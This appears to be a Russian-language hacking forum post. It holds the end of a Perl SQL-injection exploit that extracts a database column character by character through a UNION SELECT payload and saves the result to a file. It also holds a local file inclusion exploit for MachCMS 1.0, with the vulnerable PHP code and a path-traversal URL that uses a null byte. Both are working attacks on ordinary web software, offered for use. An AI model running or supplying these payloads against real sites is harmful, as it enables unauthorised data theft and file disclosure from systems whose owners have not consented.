    print "\n[>] Exploiting started... $host\n";
    
    for ($start = 1; $start<=$length; $start++) {
    	$inj = '-1%27+union+select+null,ord(substr((select+'.$column_name.'+from+'.$table_name.'+where+id='.$id.'),'.$start.',1)),null,null,null+--+';
    	$req = $host.$vuln.$inj;
    	$cont = &WebGet($req);
    	$cont =~ /$regexp/;
    	last if (!$1);
    	$char = chr($1);
    	push (@res, $char);
    }
    
    print "\n------------- [Result] --------------\n";
    print @res;
    print "\n-------------------------------------\n";
    print "\n[!] Exploiting finished :)\n";
    sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
    print RESULT $title;
    print RESULT "\n------------- [Result] --------------\n";
    print RESULT @res; 
    print RESULT "\n-------------------------------------\n";
    close (RESULT);
    print "\nResult saving in $filename\n";
    
    sub WebGet() {
        $url = $_[0];
    	$request = HTTP::Request->new(GET => $url);
    	$u_a = LWP::UserAgent->new();
    	$u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    	$u_a->timeout(5);
    	$response = $u_a->request($request);
    	if ($response->is_error) {
    	    print " ! Error: ".$response->status_line.".\n"; die " :(\n";
    	}
        return $response->content;
    }
    
    securityreason.com
    Для успешной эксплуатации необходимо:
    magic quotes = Off


    Добавлено через 2 минуты
    MachCMS 1.0
    Web site : http://machcms.sourceforge.net
    Version : 1.0
    Author : Arthur Wiebe



    [Local File Inclusion]

    Vuln file: classes/Template.php [str:61]

    PHP:
            if (file_exists("pages/$page.page/main.php")) {
                
    $template $this;
                require_once(
    "pages/$page.page/main.php");
                
    $this->parse();        
      }
    Exploit:
    if magic_quotes = OFF

    Код:
    http://[host]/[path]/index.php?q=../../../../../../../../[COLOR=Green][local_file][/COLOR]%00
    © RulleR aka Pin4eG​